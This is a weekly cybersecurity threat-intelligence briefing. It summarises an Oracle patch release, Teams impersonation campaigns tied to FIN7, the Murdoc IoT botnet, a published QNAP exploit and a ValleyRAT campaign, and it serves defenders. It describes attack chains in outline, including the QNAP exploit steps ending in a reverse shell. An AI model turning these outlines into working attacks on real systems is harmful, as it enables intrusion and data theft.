Hybrid Cloud
Cyber Security & NaaS
AI & Data
IoT & Connectivity
Business Applications
Intelligent Workplace
Consulting & Professional Services
Small Medium Enterprise
Health and Social Care
Industry
Retail
Tourism and Leisure
Transport & Logistics
Energy & Utilities
Cyber Security Weekly Briefing, 18-24 January
Oracle patches more than 300 vulnerabilities, multiple critical ones
Oracle patched 318 security vulnerabilities in the Critical Patch Update Advisory for January. Among the products that reportedly received updates, Oracle Communications had the most vulnerabilities patched, a total of 85. However, the most severe flaw affects Oracle Agile Product Lifecycle Management (PLM) Framework, has been named CVE-2025-21556 and would have a CVSSv3 of 9.9.
It is a vulnerability easily exploitable by an attacker with low privileges and network access via HTTP that would allow the takeover of the software. Also, other critical severity vulnerabilities have been fixed in this patch, including CVE-2025-21524 and CVE-2023-3961, both of which have a CVSSv3 9.8 according to Oracle and would affect JD Edwards EnterpriseOne Tools.
The vendor urges upgrading to the latest version of affected products.
New campaigns of attackers posing as Microsoft support
Sophos researchers have observed threat actors STAC5143 and STAC5777, with connections to FIN7, posing as Microsoft Teams technical support to trick employees, steal data and deploy ransomware on corporate networks. The attackers exploit the default Teams configuration, starting the infection chain by sending phishing emails.
After this, the target receives an external call and is convinced to establish a remote screen control session via Teams. Next, the attacker drops a Java file and Python scripts (RPivot backdoor) hosted on an external SharePoint link to download a legitimate ProtonVPN executable, which sideloads a malicious DLL that creates an encrypted C2 channel, providing remote access to the device.
Murdoc Botnet targets IoT devices to conduct DDoS attacks
Researchers at Qualys have warned of a new large-scale campaign that exploits security flaws in Huawei HG532 routers and AVTECH IP cameras to integrate the devices into Murdoc Botnet, a Mirai variant. The campaign has been active since at least July 2024, with more than 1 370 systems infected, with most infections located in Malaysia, Mexico, Thailand, Indonesia and Vietnam.
The botnet exploits vulnerabilities such as CVE-2017-17215 and CVE-2024-7029 to gain initial access to IoT devices and download the payload for the next phase via a shell script. This, in turn, obtains the malware from the botnet, executing it based on the CPU architecture. The ultimate goal is to use the botnet to carry out DDoS attacks.
Released PoC exploit of a QNAP vulnerability
GitHub user C411e has published a new exploit for vulnerability CVE-2024-53691, CVSSv4 8.7 according to vendor, which would have been reported in April 2024. This flaw affects QNAP's QTS and QuTS Hero operating systems and would allow a remote attacker to access the file system and execute arbitrary code on affected devices.
The recently published PoC exploit breaks down the exploitation of CVE-2024-53691 into several steps: first the attacker creates a symlink that directs to a sensitive file, then the symlink is compressed into a ZIP file and uploaded to the QNAP device via the web interface. After this, a payload is created that would contain a reverse shell, allowing the attacker to establish a remote connection to the system and escalate his privileges to become an administrator.
Patches to fix this vulnerability were released in September 2024.
New ValleyRAT campaign targeting Chinese-speaking users
Researchers at Intezer Labs have detected a new campaign of cyber-attacks by the ValleyRAT remote access Trojan targeting Chinese-speaking regions, notably Hong Kong, Taiwan and China. The attacks start with phishing pages through which users download a malicious Microsoft Installer (MSI) package that pretends to be legitimate software.
Once executed, the installer deploys a benign application to avoid suspicion, while stealthily extracting an encrypted file with the malware payload. ValleyRAT is distributed via a multi-stage loader called PNGPlug, its main purpose being to prepare the environment for the execution of the main malware and to establish persistence in the environment. The MSI package uses the CustomAction function of the Windows installer to execute malicious code, using an encrypted password 'hello202411' to extract the main malware components.
ValleyRAT, detected in 2023, provides unauthorized access and control over infected machines and is associated with the Silver Fox threat actor.
◾ This newsletter is one of the deliverables of our Operational and Strategic Intelligence service. If you are interested in knowing the rest of the Operational and Strategic Intelligence contents included in the service, please contact us →
